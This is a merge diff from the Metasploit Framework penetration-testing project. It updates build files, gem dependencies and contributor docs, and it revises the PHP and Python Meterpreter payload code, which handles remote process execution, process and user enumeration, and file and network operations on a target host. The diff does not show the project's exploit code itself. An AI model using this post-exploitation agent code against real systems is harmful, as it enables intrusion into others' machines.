Merge remote-tracking branch 'upstream/master' into pr2075

.gitignore

@@ -1,4 +1,6 @@
 .bundle
+Gemfile.local
+Gemfile.local.lock
 # Rubymine project directory
 .idea
 # Sublime Text project directory (not created by ST by default)
@@ -13,8 +15,6 @@
 config/database.yml
 # simplecov coverage data
 coverage
-data/meterpreter/ext_server_pivot.x86.dll
-data/meterpreter/ext_server_pivot.x64.dll
 doc/
 external/source/meterpreter/java/bin
 external/source/meterpreter/java/build
@@ -51,3 +51,22 @@ tags
 # ignore release/debug folders for exploits
 external/source/exploits/**/Debug
 external/source/exploits/**/Release
+
+# Avoid checking in Meterpreter binaries. These are supplied upstream by
+# the meterpreter_bins gem.
+data/meterpreter/elevator.*.dll
+data/meterpreter/ext_server_espia.*.dll
+data/meterpreter/ext_server_extapi.*.dll
+data/meterpreter/ext_server_incognito.*.dll
+data/meterpreter/ext_server_kiwi.*.dll
+data/meterpreter/ext_server_lanattacks.*.dll
+data/meterpreter/ext_server_mimikatz.*.dll
+data/meterpreter/ext_server_priv.*.dll
+data/meterpreter/ext_server_stdapi.*.dll
+data/meterpreter/metsrv.*.dll
+data/meterpreter/screenshot.*.dll
+
+# Avoid checking in Meterpreter libs that are built from
+# private source. If you're interested in this functionality,
+# check out Metasploit Pro: http://metasploit.com/download
+data/meterpreter/ext_server_pivot.*.dll

.mailmap

@@ -18,6 +18,7 @@ todb-r7 <todb-r7@github>           Tod Beardsley <tod_beardsley@rapid7.com>
 todb-r7 <todb-r7@github>           Tod Beardsley <todb@metasploit.com>
 todb-r7 <todb-r7@github>           Tod Beardsley <todb@packetfu.com>
 trosen-r7 <trosen-r7@github>       Trevor Rosen <Trevor_Rosen@rapid7.com>
+trosen-r7 <trosen-r7@github>       Trevor Rosen <trevor@catapult-creative.com>
 wchen-r7 <wchen-r7@github>         sinn3r <msfsinn3r@gmail.com> # aka sinn3r
 wchen-r7 <wchen-r7@github>         sinn3r <wei_chen@rapid7.com>
 wchen-r7 <wchen-r7@github>         Wei Chen <Wei_Chen@rapid7.com>

.rubocop.yml

@@ -0,0 +1,19 @@
+LineLength:
+  Enabled: true
+  Max: 180
+
+MethodLength:
+  Enabled: true
+  Max: 100
+
+Style/ClassLength:
+  Exclude:
+    # Most modules are quite large and all contained in one class.  This is OK.
+    - 'modules/**/*'
+
+Style/NumericLiterals:
+  Enabled: false
+
+Documentation:
+  Exclude:
+    - 'modules/**/*'

.ruby-version

@@ -1 +1 @@
-1.9.3-p484
+1.9.3-p547

.yardopts

@@ -5,3 +5,4 @@
 --files CONTRIBUTING.md,COPYING,HACKING,LICENSE
 lib/msf/**/*.rb
 lib/rex/**/*.rb
+plugins/**/*.rb

CONTRIBUTING.md

@@ -33,6 +33,7 @@ and Metasploit's [Common Coding Mistakes](https://github.com/rapid7/metasploit-f
 ## Code Contributions
 
 * **Do** stick to the [Ruby style guide](https://github.com/bbatsov/ruby-style-guide).
+* Similarly, **try** to get Rubocop passing or at least relatively quiet against the files added/modified as part of your contribution
 * **Do** follow the [50/72 rule](http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html) for Git commit messages.
 * **Do** create a [topic branch](http://git-scm.com/book/en/Git-Branching-Branching-Workflows#Topic-Branches) to work on instead of working directly on `master`.
 
@@ -50,7 +51,7 @@ Pull requests [#2940](https://github.com/rapid7/metasploit-framework/pull/2940)
 #### New Modules
 
 * **Do** run `tools/msftidy.rb` against your module and fix any errors or warnings that come up. Even better would be to set up `msftidy.rb` as a [pre-commit hook](https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb).
-* **Do** use the [many module mixin APIs](https://dev.metasploit.com/documents/api/). Wheel improvements are welcome; wheel reinventions, not so much.
+* **Do** use the [many module mixin APIs](https://dev.metasploit.com/api/). Wheel improvements are welcome; wheel reinventions, not so much.
 * **Don't** include more than one module per pull request.
 
 #### Library Code

Gemfile

@@ -1,27 +1,31 @@
 source 'https://rubygems.org'
 
 # Need 3+ for ActiveSupport::Concern
-gem 'activesupport', '>= 3.0.0'
+gem 'activesupport', '>= 3.0.0', '< 4.0.0'
 # Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb)
 gem 'bcrypt'
 # Needed for some admin modules (scrutinizer_add_user.rb)
 gem 'json'
+# Needed for Meterpreter on Windows, soon others.
+gem 'meterpreter_bins', '0.0.6'
 # Needed by msfgui and other rpc components
 gem 'msgpack'
 # Needed by anemone crawler
 gem 'nokogiri'
+# Needed by db.rb and Msf::Exploit::Capture
+gem 'packetfu', '1.1.9'
 # Needed by JSObfu
 gem 'rkelly-remix', '0.0.6'
 # Needed by anemone crawler
 gem 'robots'
-# Needed by db.rb and Msf::Exploit::Capture
-gem 'packetfu', '1.1.9'
+# Needed for some post modules
+gem 'sqlite3'
 
 group :db do
   # Needed for Msf::DbManager
-  gem 'activerecord'
+  gem 'activerecord', '>= 3.0.0', '< 4.0.0'
   # Database models shared between framework and Pro.
-  gem 'metasploit_data_models', '~> 0.17.0'
+  gem 'metasploit_data_models', '0.17.0'
   # Needed for module caching in Mdm::ModuleDetails
   gem 'pg', '>= 0.11'
 end
@@ -33,6 +37,8 @@ group :pcap do
 end
 
 group :development do
+  # Style/sanity checking Ruby code
+  gem 'rubocop'
   # Markdown formatting for yard
   gem 'redcarpet'
   # generating documentation

Gemfile.local.example

@@ -0,0 +1,36 @@
+##
+# Example Gemfile.local file for Metasploit Framework
+#
+# The Gemfile.local file provides a way to use other gems that are not
+# included in the standard Gemfile provided with Metasploit.
+# This filename is included in Metasploit's .gitignore file, so local changes
+# to this file will not accidentally show up in future pull requests. This
+# example Gemfile.local includes all gems in Gemfile using instance_eval.
+# It also creates a new bundle group, 'local', to hold additional gems.
+#
+# This file will not be used by default within the framework. As such, one
+# must first install the custom Gemfile.local with bundle:
+#   bundle install --gemfile Gemfile.local
+#
+# Note that msfupdate does not consider Gemfile.local when updating the
+# framework. If it is used, it may be necessary to run the above bundle
+# command after the update.
+#
+###
+
+# Include the Gemfile included with the framework. This is very
+# important for picking up new gem dependencies.
+msf_gemfile = File.join(File.dirname(__FILE__), 'Gemfile')
+if File.readable?(msf_gemfile)
+  instance_eval(File.read(msf_gemfile))
+end
+
+# Create a custom group
+group :local do
+  # Use pry to help view and interact with objects in the framework
+  gem 'pry', '~> 0.9'
+  # Use pry-debugger to step through code during development
+  gem 'pry-debugger', '~> 0.2'
+  # Add the lab gem so that the 'lab' plugin will work again
+  gem 'lab', '~> 0.2.7'
+end

Gemfile.lock

@@ -13,6 +13,7 @@ GEM
       i18n (~> 0.6, >= 0.6.4)
       multi_json (~> 1.0)
     arel (3.0.2)
+    ast (2.0.0)
     bcrypt (3.1.7)
     builder (3.0.4)
     database_cleaner (1.1.1)
@@ -26,6 +27,7 @@ GEM
       activerecord (>= 3.2.13)
       activesupport
       pg
+    meterpreter_bins (0.0.6)
     mini_portile (0.5.1)
     msgpack (0.5.5)
     multi_json (1.0.4)
@@ -33,8 +35,13 @@ GEM
     nokogiri (1.6.0)
       mini_portile (~> 0.5.0)
     packetfu (1.1.9)
+    parser (2.1.9)
+      ast (>= 1.1, < 3.0)
+      slop (~> 3.4, >= 3.4.5)
     pcaprub (0.11.3)
     pg (0.16.0)
+    powerpack (0.0.9)
+    rainbow (2.0.0)
     rake (10.1.0)
     redcarpet (3.0.0)
     rkelly-remix (0.0.6)
@@ -47,12 +54,21 @@ GEM
     rspec-expectations (2.14.2)
       diff-lcs (>= 1.1.3, < 2.0)
     rspec-mocks (2.14.3)
+    rubocop (0.23.0)
+      json (>= 1.7.7, < 2)
+      parser (~> 2.1.9)
+      powerpack (~> 0.0.6)
+      rainbow (>= 1.99.1, < 3.0)
+      ruby-progressbar (~> 1.4)
+    ruby-progressbar (1.5.1)
     shoulda-matchers (2.3.0)
       activesupport (>= 3.0.0)
     simplecov (0.5.4)
       multi_json (~> 1.0.3)
       simplecov-html (~> 0.5.3)
     simplecov-html (0.5.3)
+    slop (3.5.0)
+    sqlite3 (1.3.9)
     timecop (0.6.3)
     tzinfo (0.3.37)
     yard (0.8.7)
@@ -61,14 +77,15 @@ PLATFORMS
   ruby
 
 DEPENDENCIES
-  activerecord
-  activesupport (>= 3.0.0)
+  activerecord (>= 3.0.0, < 4.0.0)
+  activesupport (>= 3.0.0, < 4.0.0)
   bcrypt
   database_cleaner
   factory_girl (>= 4.1.0)
   fivemat (= 1.2.1)
   json
-  metasploit_data_models (~> 0.17.0)
+  metasploit_data_models (= 0.17.0)
+  meterpreter_bins (= 0.0.6)
   msgpack
   network_interface (~> 0.0.1)
   nokogiri
@@ -80,7 +97,9 @@ DEPENDENCIES
   rkelly-remix (= 0.0.6)
   robots
   rspec (>= 2.12)
+  rubocop
   shoulda-matchers
   simplecov (= 0.5.4)
+  sqlite3
   timecop
   yard

HACKING

@@ -10,7 +10,7 @@ CONTRIBUTING.md
 in the same directory as this file, and to a lesser extent:
 
 The Metasploit Development Environment
-https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Development-Environment
+https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment
 
 Common Coding Mistakes
 https://github.com/rapid7/metasploit-framework/wiki/Common-Metasploit-Module-Coding-Mistakes

LICENSE

@@ -36,6 +36,10 @@ Files: external/ruby-lorcon/*
 Copyright: 2005, dragorn and Joshua Wright
 License: LGPL-2.1
 
+Files: external/source/exploits/IE11SandboxEscapes/*
+Copyright: James Forshaw, 2014
+License: GPLv3
+
 Files: external/source/byakugan/*
 Copyright: Lurene Grenier, 2009
 License: BSD-3-clause

data/js/detect/os.js

@@ -20,6 +20,7 @@ arch_armle    = "armle";
 arch_x86      = "x86";
 arch_x86_64   = "x86_64";
 arch_ppc      = "ppc";
+arch_mipsle   = "mipsle";
 
 window.os_detect = {};
 
@@ -184,9 +185,15 @@ window.os_detect.getVersion = function(){
 			} else if (platform.match(/arm/)) {
 				// Android and maemo
 				arch = arch_armle;
-				if (navigator.userAgent.match(/android/i)) {
-					os_flavor = 'Android';
-				}
+			} else if (platform.match(/x86/)) {
+				arch = arch_x86;
+			} else if (platform.match(/mips/)) {
+				arch = arch_mipsle;
+			}
+
+
+			if (navigator.userAgent.match(/android/i)) {
+				os_flavor = 'Android';
 			}
 		} else if (platform.match(/windows/)) {
 			os_name = oses_windows;

data/meterpreter/ext_server_stdapi.php

@@ -6,10 +6,10 @@
 ##
 # General
 ##
-define("TLV_TYPE_HANDLE",              TLV_META_TYPE_UINT    |  600);
+define("TLV_TYPE_HANDLE",              TLV_META_TYPE_QWORD   |  600);
 define("TLV_TYPE_INHERIT",             TLV_META_TYPE_BOOL    |  601);
-define("TLV_TYPE_PROCESS_HANDLE",      TLV_META_TYPE_UINT    |  630);
-define("TLV_TYPE_THREAD_HANDLE",       TLV_META_TYPE_UINT    |  631);
+define("TLV_TYPE_PROCESS_HANDLE",      TLV_META_TYPE_QWORD   |  630);
+define("TLV_TYPE_THREAD_HANDLE",       TLV_META_TYPE_QWORD   |  631);
 
 ##
 # Fs
@@ -65,7 +65,7 @@ define("PROCESS_EXECUTE_FLAG_SUSPENDED", (1 << 2));
 define("PROCESS_EXECUTE_FLAG_USE_THREAD_TOKEN", (1 << 3));
 
 # Registry
-define("TLV_TYPE_HKEY",                TLV_META_TYPE_UINT    | 1000);
+define("TLV_TYPE_HKEY",                TLV_META_TYPE_QWORD   | 1000);
 define("TLV_TYPE_ROOT_KEY",            TLV_TYPE_HKEY);
 define("TLV_TYPE_BASE_KEY",            TLV_META_TYPE_STRING  | 1001);
 define("TLV_TYPE_PERMISSION",          TLV_META_TYPE_UINT    | 1002);
@@ -90,12 +90,12 @@ define("TLV_TYPE_ENV_GROUP",           TLV_META_TYPE_GROUP   | 1102);
 define("DELETE_KEY_FLAG_RECURSIVE", (1 << 0));
 
 # Process
-define("TLV_TYPE_BASE_ADDRESS",        TLV_META_TYPE_UINT    | 2000);
+define("TLV_TYPE_BASE_ADDRESS",        TLV_META_TYPE_QWORD   | 2000);
 define("TLV_TYPE_ALLOCATION_TYPE",     TLV_META_TYPE_UINT    | 2001);
 define("TLV_TYPE_PROTECTION",          TLV_META_TYPE_UINT    | 2002);
 define("TLV_TYPE_PROCESS_PERMS",       TLV_META_TYPE_UINT    | 2003);
 define("TLV_TYPE_PROCESS_MEMORY",      TLV_META_TYPE_RAW     | 2004);
-define("TLV_TYPE_ALLOC_BASE_ADDRESS",  TLV_META_TYPE_UINT    | 2005);
+define("TLV_TYPE_ALLOC_BASE_ADDRESS",  TLV_META_TYPE_QWORD   | 2005);
 define("TLV_TYPE_MEMORY_STATE",        TLV_META_TYPE_UINT    | 2006);
 define("TLV_TYPE_MEMORY_TYPE",         TLV_META_TYPE_UINT    | 2007);
 define("TLV_TYPE_ALLOC_PROTECTION",    TLV_META_TYPE_UINT    | 2008);
@@ -109,16 +109,16 @@ define("TLV_TYPE_PROCESS_ARGUMENTS",   TLV_META_TYPE_STRING  | 2305);
 define("TLV_TYPE_IMAGE_FILE",          TLV_META_TYPE_STRING  | 2400);
 define("TLV_TYPE_IMAGE_FILE_PATH",     TLV_META_TYPE_STRING  | 2401);
 define("TLV_TYPE_PROCEDURE_NAME",      TLV_META_TYPE_STRING  | 2402);
-define("TLV_TYPE_PROCEDURE_ADDRESS",   TLV_META_TYPE_UINT    | 2403);
-define("TLV_TYPE_IMAGE_BASE",          TLV_META_TYPE_UINT    | 2404);
+define("TLV_TYPE_PROCEDURE_ADDRESS",   TLV_META_TYPE_QWORD   | 2403);
+define("TLV_TYPE_IMAGE_BASE",          TLV_META_TYPE_QWORD   | 2404);
 define("TLV_TYPE_IMAGE_GROUP",         TLV_META_TYPE_GROUP   | 2405);
 define("TLV_TYPE_IMAGE_NAME",          TLV_META_TYPE_STRING  | 2406);
 
 define("TLV_TYPE_THREAD_ID",           TLV_META_TYPE_UINT    | 2500);
 define("TLV_TYPE_THREAD_PERMS",        TLV_META_TYPE_UINT    | 2502);
 define("TLV_TYPE_EXIT_CODE",           TLV_META_TYPE_UINT    | 2510);
-define("TLV_TYPE_ENTRY_POINT",         TLV_META_TYPE_UINT    | 2511);
-define("TLV_TYPE_ENTRY_PARAMETER",     TLV_META_TYPE_UINT    | 2512);
+define("TLV_TYPE_ENTRY_POINT",         TLV_META_TYPE_QWORD   | 2511);
+define("TLV_TYPE_ENTRY_PARAMETER",     TLV_META_TYPE_QWORD   | 2512);
 define("TLV_TYPE_CREATION_FLAGS",      TLV_META_TYPE_UINT    | 2513);
 
 define("TLV_TYPE_REGISTER_NAME",       TLV_META_TYPE_STRING  | 2540);
@@ -137,7 +137,7 @@ define("TLV_TYPE_DESKTOP",             TLV_META_TYPE_STRING  | 3002);
 # Event Log
 ##
 define("TLV_TYPE_EVENT_SOURCENAME",    TLV_META_TYPE_STRING  | 4000);
-define("TLV_TYPE_EVENT_HANDLE",        TLV_META_TYPE_UINT    | 4001);
+define("TLV_TYPE_EVENT_HANDLE",        TLV_META_TYPE_QWORD   | 4001);
 define("TLV_TYPE_EVENT_NUMRECORDS",    TLV_META_TYPE_UINT    | 4002);
 
 define("TLV_TYPE_EVENT_READFLAGS",     TLV_META_TYPE_UINT    | 4003);

data/meterpreter/ext_server_stdapi.py

@@ -48,6 +48,24 @@ try:
 except ImportError:
 	has_winreg = False
 
+try:
+	import winreg
+	has_winreg = True
+except ImportError:
+	has_winreg = (has_winreg or False)
+
+if sys.version_info[0] < 3:
+	is_str = lambda obj: issubclass(obj.__class__, str)
+	is_bytes = lambda obj: issubclass(obj.__class__, str)
+	bytes = lambda *args: str(*args[:1])
+	NULL_BYTE = '\x00'
+else:
+	is_str = lambda obj: issubclass(obj.__class__, __builtins__['str'])
+	is_bytes = lambda obj: issubclass(obj.__class__, bytes)
+	str = lambda x: __builtins__['str'](x, 'UTF-8')
+	NULL_BYTE = bytes('\x00', 'UTF-8')
+	long = int
+
 if has_ctypes:
 	#
 	# Windows Structures
@@ -234,6 +252,7 @@ TLV_META_TYPE_STRING     = (1 << 16)
 TLV_META_TYPE_UINT       = (1 << 17)
 TLV_META_TYPE_RAW        = (1 << 18)
 TLV_META_TYPE_BOOL       = (1 << 19)
+TLV_META_TYPE_QWORD      = (1 << 20)
 TLV_META_TYPE_COMPRESSED = (1 << 29)
 TLV_META_TYPE_GROUP      = (1 << 30)
 TLV_META_TYPE_COMPLEX    = (1 << 31)
@@ -266,10 +285,10 @@ TLV_TYPE_CHANNEL_CLASS         = TLV_META_TYPE_UINT    | 54
 ##
 # General
 ##
-TLV_TYPE_HANDLE                = TLV_META_TYPE_UINT    | 600
+TLV_TYPE_HANDLE                = TLV_META_TYPE_QWORD   | 600
 TLV_TYPE_INHERIT               = TLV_META_TYPE_BOOL    | 601
-TLV_TYPE_PROCESS_HANDLE        = TLV_META_TYPE_UINT    | 630
-TLV_TYPE_THREAD_HANDLE         = TLV_META_TYPE_UINT    | 631
+TLV_TYPE_PROCESS_HANDLE        = TLV_META_TYPE_QWORD   | 630
+TLV_TYPE_THREAD_HANDLE         = TLV_META_TYPE_QWORD   | 631
 
 ##
 # Fs
@@ -328,7 +347,7 @@ TLV_TYPE_SHUTDOWN_HOW          = TLV_META_TYPE_UINT    | 1530
 ##
 # Registry
 ##
-TLV_TYPE_HKEY                  = TLV_META_TYPE_UINT    | 1000
+TLV_TYPE_HKEY                  = TLV_META_TYPE_QWORD   | 1000
 TLV_TYPE_ROOT_KEY              = TLV_TYPE_HKEY
 TLV_TYPE_BASE_KEY              = TLV_META_TYPE_STRING  | 1001
 TLV_TYPE_PERMISSION            = TLV_META_TYPE_UINT    | 1002
@@ -358,12 +377,12 @@ DELETE_KEY_FLAG_RECURSIVE = (1 << 0)
 ##
 # Process
 ##
-TLV_TYPE_BASE_ADDRESS          = TLV_META_TYPE_UINT    | 2000
+TLV_TYPE_BASE_ADDRESS          = TLV_META_TYPE_QWORD   | 2000
 TLV_TYPE_ALLOCATION_TYPE       = TLV_META_TYPE_UINT    | 2001
 TLV_TYPE_PROTECTION            = TLV_META_TYPE_UINT    | 2002
 TLV_TYPE_PROCESS_PERMS         = TLV_META_TYPE_UINT    | 2003
 TLV_TYPE_PROCESS_MEMORY        = TLV_META_TYPE_RAW     | 2004
-TLV_TYPE_ALLOC_BASE_ADDRESS    = TLV_META_TYPE_UINT    | 2005
+TLV_TYPE_ALLOC_BASE_ADDRESS    = TLV_META_TYPE_QWORD   | 2005
 TLV_TYPE_MEMORY_STATE          = TLV_META_TYPE_UINT    | 2006
 TLV_TYPE_MEMORY_TYPE           = TLV_META_TYPE_UINT    | 2007
 TLV_TYPE_ALLOC_PROTECTION      = TLV_META_TYPE_UINT    | 2008
@@ -379,16 +398,16 @@ TLV_TYPE_PARENT_PID            = TLV_META_TYPE_UINT    | 2307
 TLV_TYPE_IMAGE_FILE            = TLV_META_TYPE_STRING  | 2400
 TLV_TYPE_IMAGE_FILE_PATH       = TLV_META_TYPE_STRING  | 2401
 TLV_TYPE_PROCEDURE_NAME        = TLV_META_TYPE_STRING  | 2402
-TLV_TYPE_PROCEDURE_ADDRESS     = TLV_META_TYPE_UINT    | 2403
-TLV_TYPE_IMAGE_BASE            = TLV_META_TYPE_UINT    | 2404
+TLV_TYPE_PROCEDURE_ADDRESS     = TLV_META_TYPE_QWORD   | 2403
+TLV_TYPE_IMAGE_BASE            = TLV_META_TYPE_QWORD   | 2404
 TLV_TYPE_IMAGE_GROUP           = TLV_META_TYPE_GROUP   | 2405
 TLV_TYPE_IMAGE_NAME            = TLV_META_TYPE_STRING  | 2406
 
 TLV_TYPE_THREAD_ID             = TLV_META_TYPE_UINT    | 2500
 TLV_TYPE_THREAD_PERMS          = TLV_META_TYPE_UINT    | 2502
 TLV_TYPE_EXIT_CODE             = TLV_META_TYPE_UINT    | 2510
-TLV_TYPE_ENTRY_POINT           = TLV_META_TYPE_UINT    | 2511
-TLV_TYPE_ENTRY_PARAMETER       = TLV_META_TYPE_UINT    | 2512
+TLV_TYPE_ENTRY_POINT           = TLV_META_TYPE_QWORD   | 2511
+TLV_TYPE_ENTRY_PARAMETER       = TLV_META_TYPE_QWORD   | 2512
 TLV_TYPE_CREATION_FLAGS        = TLV_META_TYPE_UINT    | 2513
 
 TLV_TYPE_REGISTER_NAME         = TLV_META_TYPE_STRING  | 2540
@@ -407,7 +426,7 @@ TLV_TYPE_DESKTOP               = TLV_META_TYPE_STRING  | 3002
 # Event Log
 ##
 TLV_TYPE_EVENT_SOURCENAME      = TLV_META_TYPE_STRING  | 4000
-TLV_TYPE_EVENT_HANDLE          = TLV_META_TYPE_UINT    | 4001
+TLV_TYPE_EVENT_HANDLE          = TLV_META_TYPE_QWORD   | 4001
 TLV_TYPE_EVENT_NUMRECORDS      = TLV_META_TYPE_UINT    | 4002
 
 TLV_TYPE_EVENT_READFLAGS       = TLV_META_TYPE_UINT    | 4003
@@ -498,11 +517,12 @@ def get_stat_buffer(path):
 		blocks = si.st_blocks
 	st_buf = struct.pack('<IHHH', si.st_dev, min(0xffff, si.st_ino), si.st_mode, si.st_nlink)
 	st_buf += struct.pack('<HHHI', si.st_uid, si.st_gid, 0, rdev)
-	st_buf += struct.pack('<IIII', si.st_size, si.st_atime, si.st_mtime, si.st_ctime)
+	st_buf += struct.pack('<IIII', si.st_size, long(si.st_atime), long(si.st_mtime), long(si.st_ctime))
 	st_buf += struct.pack('<II', blksize, blocks)
 	return st_buf
 
 def netlink_request(req_type):
+	import select
 	# See RFC 3549
 	NLM_F_REQUEST    = 0x0001
 	NLM_F_ROOT       = 0x0100
@@ -513,17 +533,25 @@ def netlink_request(req_type):
 	sock.bind((os.getpid(), 0))
 	seq = int(time.time())
 	nlmsg = struct.pack('IHHIIB15x', 32, req_type, (NLM_F_REQUEST | NLM_F_ROOT), seq, 0, socket.AF_UNSPEC)
-	sfd = os.fdopen(sock.fileno(), 'w+b')
-	sfd.write(nlmsg)
+	sock.send(nlmsg)
 	responses = []
-	response = cstruct_unpack(NLMSGHDR, sfd.read(ctypes.sizeof(NLMSGHDR)))
+	if not len(select.select([sock.fileno()], [], [], 0.5)[0]):
+		return responses
+	raw_response_data = sock.recv(0xfffff)
+	response = cstruct_unpack(NLMSGHDR, raw_response_data[:ctypes.sizeof(NLMSGHDR)])
+	raw_response_data = raw_response_data[ctypes.sizeof(NLMSGHDR):]
 	while response.type != NLMSG_DONE:
 		if response.type == NLMSG_ERROR:
 			break
-		response_data = sfd.read(response.len - 16)
+		response_data = raw_response_data[:(response.len - 16)]
 		responses.append(response_data)
-		response = cstruct_unpack(NLMSGHDR, sfd.read(ctypes.sizeof(NLMSGHDR)))
-	sfd.close()
+		raw_response_data = raw_response_data[len(response_data):]
+		if not len(raw_response_data):
+			if not len(select.select([sock.fileno()], [], [], 0.5)[0]):
+				break
+			raw_response_data = sock.recv(0xfffff)
+		response = cstruct_unpack(NLMSGHDR, raw_response_data[:ctypes.sizeof(NLMSGHDR)])
+		raw_response_data = raw_response_data[ctypes.sizeof(NLMSGHDR):]
 	sock.close()
 	return responses
 
@@ -559,7 +587,7 @@ def channel_open_stdapi_fs_file(request, response):
 	else:
 		fmode = 'rb'
 	file_h = open(fpath, fmode)
-	channel_id = meterpreter.add_channel(file_h)
+	channel_id = meterpreter.add_channel(MeterpreterFile(file_h))
 	response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
 	return ERROR_SUCCESS, response
 
@@ -675,6 +703,7 @@ def stdapi_sys_process_execute(request, response):
 			proc_h.stderr = open(os.devnull, 'rb')
 		else:
 			proc_h = STDProcess(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+			proc_h.echo_protection = True
 		proc_h.start()
 	else:
 		proc_h = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
@@ -693,15 +722,15 @@ def stdapi_sys_process_getpid(request, response):
 
 def stdapi_sys_process_get_processes_via_proc(request, response):
 	for pid in os.listdir('/proc'):
-		pgroup = ''
+		pgroup = bytes()
 		if not os.path.isdir(os.path.join('/proc', pid)) or not pid.isdigit():
 			continue
-		cmd = open(os.path.join('/proc', pid, 'cmdline'), 'rb').read(512).replace('\x00', ' ')
-		status_data = open(os.path.join('/proc', pid, 'status'), 'rb').read()
+		cmdline_file = open(os.path.join('/proc', pid, 'cmdline'), 'rb')
+		cmd = str(cmdline_file.read(512).replace(NULL_BYTE, bytes(' ', 'UTF-8')))
+		status_data = str(open(os.path.join('/proc', pid, 'status'), 'rb').read())
 		status_data = map(lambda x: x.split('\t',1), status_data.split('\n'))
-		status_data = filter(lambda x: len(x) == 2, status_data)
 		status = {}
-		for k, v in status_data:
+		for k, v in filter(lambda x: len(x) == 2, status_data):
 			status[k[:-1]] = v.strip()
 		ppid = status.get('PPid')
 		uid = status.get('Uid').split('\t', 1)[0]
@@ -725,14 +754,14 @@ def stdapi_sys_process_get_processes_via_proc(request, response):
 def stdapi_sys_process_get_processes_via_ps(request, response):
 	ps_args = ['ps', 'ax', '-w', '-o', 'pid,ppid,user,command']
 	proc_h = subprocess.Popen(ps_args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
-	ps_output = proc_h.stdout.read()
+	ps_output = str(proc_h.stdout.read())
 	ps_output = ps_output.split('\n')
 	ps_output.pop(0)
 	for process in ps_output:
 		process = process.split()
 		if len(process) < 4:
 			break
-		pgroup = ''
+		pgroup  = bytes()
 		pgroup += tlv_pack(TLV_TYPE_PID, int(process[0]))
 		pgroup += tlv_pack(TLV_TYPE_PARENT_PID, int(process[1]))
 		pgroup += tlv_pack(TLV_TYPE_USER_NAME, process[2])
@@ -793,7 +822,7 @@ def stdapi_sys_process_get_processes_via_windll(request, response):
 				use = ctypes.c_ulong()
 				use.value = 0
 				ctypes.windll.advapi32.LookupAccountSidA(None, user_tkn.Sid, username, ctypes.byref(u_len), domain, ctypes.byref(d_len), ctypes.byref(use))
-				complete_username = ctypes.string_at(domain) + '\\' + ctypes.string_at(username)
+				complete_username = str(ctypes.string_at(domain)) + '\\' + str(ctypes.string_at(username))
 			k32.CloseHandle(tkn_h)
 		parch = windll_GetNativeSystemInfo()
 		is_wow64 = ctypes.c_ubyte()
@@ -802,7 +831,7 @@ def stdapi_sys_process_get_processes_via_windll(request, response):
 			if k32.IsWow64Process(proc_h, ctypes.byref(is_wow64)):
 				if is_wow64.value:
 					parch = PROCESS_ARCH_X86
-		pgroup = ''
+		pgroup  = bytes()
 		pgroup += tlv_pack(TLV_TYPE_PID, pe32.th32ProcessID)
 		pgroup += tlv_pack(TLV_TYPE_PARENT_PID, pe32.th32ParentProcessID)
 		pgroup += tlv_pack(TLV_TYPE_USER_NAME, complete_username)
@@ -850,16 +879,18 @@ def stdapi_fs_delete_dir(request, response):
 @meterpreter.register_function
 def stdapi_fs_delete_file(request, response):
 	file_path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
-	os.unlink(file_path)
+	if os.path.exists(file_path):
+		os.unlink(file_path)
 	return ERROR_SUCCESS, response
 
 @meterpreter.register_function
 def stdapi_fs_file_expand_path(request, response):
 	path_tlv = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
 	if has_windll:
+		path_tlv = ctypes.create_string_buffer(bytes(path_tlv, 'UTF-8'))
 		path_out = (ctypes.c_char * 4096)()
-		path_out_len = ctypes.windll.kernel32.ExpandEnvironmentStringsA(path_tlv, ctypes.byref(path_out), ctypes.sizeof(path_out))
-		result = ''.join(path_out)[:path_out_len]
+		path_out_len = ctypes.windll.kernel32.ExpandEnvironmentStringsA(ctypes.byref(path_tlv), ctypes.byref(path_out), ctypes.sizeof(path_out))
+		result = str(ctypes.string_at(path_out))
 	elif path_tlv == '%COMSPEC%':
 		result = '/bin/sh'
 	elif path_tlv in ['%TEMP%', '%TMP%']:
@@ -912,7 +943,8 @@ def stdapi_fs_md5(request, response):
 @meterpreter.register_function
 def stdapi_fs_mkdir(request, response):
 	dir_path = packet_get_tlv(request, TLV_TYPE_DIRECTORY_PATH)['value']
-	os.mkdir(dir_path)
+	if not os.path.isdir(dir_path):
+		os.mkdir(dir_path)
 	return ERROR_SUCCESS, response
 
 @meterpreter.register_function
@@ -965,7 +997,7 @@ def stdapi_fs_stat(request, response):
 
 @meterpreter.register_function
 def stdapi_net_config_get_interfaces(request, response):
-	if hasattr(socket, 'AF_NETLINK'):
+	if hasattr(socket, 'AF_NETLINK') and hasattr(socket, 'NETLINK_ROUTE'):
 		interfaces = stdapi_net_config_get_interfaces_via_netlink()
 	elif has_osxsc:
 		interfaces = stdapi_net_config_get_interfaces_via_osxsc()
@@ -974,7 +1006,7 @@ def stdapi_net_config_get_interfaces(request, response):
 	else:
 		return ERROR_FAILURE, response
 	for iface_info in interfaces:
-		iface_tlv  = ''
+		iface_tlv  = bytes()
 		iface_tlv += tlv_pack(TLV_TYPE_MAC_NAME, iface_info.get('name', 'Unknown'))
 		iface_tlv += tlv_pack(TLV_TYPE_MAC_ADDRESS, iface_info.get('hw_addr', '\x00\x00\x00\x00\x00\x00'))
 		if 'mtu' in iface_info:
@@ -1002,7 +1034,7 @@ def stdapi_net_config_get_interfaces_via_netlink():
 		0x0100: 'PROMISC',
 		0x1000: 'MULTICAST'
 	}
-	iface_flags_sorted = iface_flags.keys()
+	iface_flags_sorted = list(iface_flags.keys())
 	# Dictionaries don't maintain order
 	iface_flags_sorted.sort()
 	interfaces = {}
@@ -1106,7 +1138,7 @@ def stdapi_net_config_get_interfaces_via_osxsc():
 			hw_addr = hw_addr.replace(':', '')
 			hw_addr = hw_addr.decode('hex')
 			iface_info['hw_addr'] = hw_addr
-	ifnames = interfaces.keys()
+	ifnames = list(interfaces.keys())
 	ifnames.sort()
